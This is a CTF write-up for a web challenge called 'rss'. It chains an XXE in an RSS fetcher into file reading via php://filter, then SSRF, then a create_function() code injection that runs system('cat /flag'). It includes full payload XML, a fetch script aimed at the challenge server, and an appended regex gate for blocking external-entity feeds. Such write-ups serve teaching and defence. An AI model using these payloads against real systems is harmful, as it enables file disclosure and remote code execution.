[Web] rss - LanceaKing xp0int Posted on Sep 11 2019

As with boring_code, upload the XML payload to Baidu Cloud; fuzzing quickly turns up an XXE.

## XXE to LFI

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rss [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=./index.php">
]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>先知安全技术社区</title>
    <link>http://xz.aliyun.com/forum/</link>
    <description>先知安全技术社区</description>
    <atom:link href="http://xz.aliyun.com/forum/feed/" rel="self"></atom:link>
    <language>zh-hans</language>
    <lastBuildDate>Tue, 02 Jul 2019 06:03:00 +0800</lastBuildDate>
    <item>
      <title>利用Excel power query实现远程DDE执行</title>
      <link>http://xz.aliyun.com/t/5514</link>
      <description><pre>&xxe;</pre></description>
      <pubDate>Tue, 02 Jul 2019 06:03:00 +0800</pubDate>
      <guid>http://xz.aliyun.com/t/5514</guid>
    </item>
  </channel>
</rss>
```

Following the include of route.php in index.php and the `__autoload()` handler, read out every file step by step:

![title](https://leanote.com/api/file/getImage?fileId=5d7528a3ab644160a900776c)

## fetch.py

For convenience, I also wrote a script that submits the Baidu Cloud link and receives the base64 data returned:

```python
import re
import sys
from base64 import b64decode

import requests

BASE = 'http://112.126.96.50:9999'

# Submit the feed URL (argv[1]) to the target's /fetch endpoint
r = requests.post(BASE + '/fetch', data={'rss_url': sys.argv[1]})

# The entity expands inside <pre>...</pre>, so pull out the base64 blob from there
mo = re.search(r'<pre>([a-zA-Z\d\+/\=]+)</pre>', r.text)
if mo is None:
    print('[!] no result')
    sys.exit(-1)

bdata = mo.group(1)
data = b64decode(bdata)
print('[+] success')
print(data.decode())
```

## XXE to SSRF

`/rss_in_order`: requires local access, so use the XXE for SSRF.

![title](https://leanote.com/api/file/getImage?fileId=5d75297eab644162bb0078ae)

`Admin::sort`: also reads an XML file, but does not restrict the URL, so it can read local files directly.

![title](https://leanote.com/api/file/getImage?fileId=5d752a2bab644162bb0078cf)

`/views/Admin.php`: uses `create_function()` to build the comparison function used for sorting.

![title](https://leanote.com/api/file/getImage?fileId=5d752a85ab644162bb0078e2)

`create_function()` allows code injection:

![title](https://leanote.com/api/file/getImage?fileId=5d752c24ab644160a90077ff)

## ssrf payload

`http://127.0.0.1/rss_in_order?order=title,$b->title);}phpinfo();die();/*&rss_url=./file/example`

## final payload

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rss [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1/rss_in_order?rss_url=.%2Ffile%2Fexample&order=title%2C%24b-%3Etitle%29%3B%7D%40eval%28%24_REQUEST%5Bx%5D%29%3Bdie%28%29%3B%2F%2A&x=system%28%27cat+%2Fflag_eb8ba2eb07702e69963a7d6ab8669134%27%29%3B">
]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>先知安全技术社区</title>
    <link>http://xz.aliyun.com/forum/</link>
    <description>先知安全技术社区</description>
    <atom:link href="http://xz.aliyun.com/forum/feed/" rel="self"></atom:link>
    <language>zh-hans</language>
    <lastBuildDate>Tue, 02 Jul 2019 06:03:00 +0800</lastBuildDate>
    <item>
      <title>利用Excel power query实现远程DDE执行</title>
      <link>http://xz.aliyun.com/t/5514</link>
      <description><pre>&xxe;</pre></description>
      <pubDate>Tue, 02 Jul 2019 06:03:00 +0800</pubDate>
      <guid>http://xz.aliyun.com/t/5514</guid>
    </item>
  </channel>
</rss>
```

![image title](https://leanote.com/api/file/getImage?fileId=5d752f5bab644160a9007888)
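Both the LFI payload and the final payload rely on the feed parser accepting a DTD with an external entity pointing at a `php://filter` wrapper. As an added example (not part of the original writeup or the challenge code), here is a Python pre-parse gate that rejects such feeds before they reach the XML parser; the feed samples are constructed and the function names are my own.

```python
import re
import xml.etree.ElementTree as ET

# A user-supplied RSS feed has no legitimate need for any of these: a DTD at all,
# an external (SYSTEM/PUBLIC) entity declaration, or a PHP stream-wrapper URL.
DOCTYPE_RE = re.compile(rb'<!DOCTYPE', re.IGNORECASE)
ENTITY_RE = re.compile(rb'<!ENTITY\s+\S+\s+(SYSTEM|PUBLIC)', re.IGNORECASE)
WRAPPER_RE = re.compile(rb'\b(php|file|phar|data|expect)://', re.IGNORECASE)

def check_feed(raw: bytes) -> list:
    """Return the reasons the feed should be rejected (empty list = acceptable)."""
    reasons = []
    if DOCTYPE_RE.search(raw):
        reasons.append('DOCTYPE declaration present')
    if ENTITY_RE.search(raw):
        reasons.append('external entity declaration (SYSTEM/PUBLIC)')
    if WRAPPER_RE.search(raw):
        reasons.append('stream wrapper URL in feed')
    return reasons

def parse_feed(raw: bytes) -> list:
    """Gate the raw bytes first, then return [{title, link}] for every <item>."""
    reasons = check_feed(raw)
    if reasons:
        raise ValueError('rejected feed: ' + '; '.join(reasons))
    root = ET.fromstring(raw)
    return [{'title': item.findtext('title', default=''),
             'link': item.findtext('link', default='')}
            for item in root.iter('item')]

# Constructed sample: the LFI payload from this writeup, trimmed to one item
XXE_FEED = b'''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rss [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=./index.php">
]>
<rss version="2.0"><channel><title>t</title>
<item><title>x</title><link>http://example.invalid/1</link><description><pre>&xxe;</pre></description></item>
</channel></rss>'''

# Constructed sample: a benign feed with no DTD
GOOD_FEED = b'''<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"><channel><title>t</title>
<item><title>hello</title><link>http://example.invalid/1</link></item>
<item><title>world</title><link>http://example.invalid/2</link></item>
</channel></rss>'''

if __name__ == '__main__':
    print(check_feed(XXE_FEED))   # three reasons, feed rejected
    print(parse_feed(GOOD_FEED))  # two items parsed normally
```

Rejecting on the raw bytes is deliberate: it does not depend on whether the underlying XML library happens to resolve external entities, so the same gate works in front of PHP's `simplexml_load_file()` as well.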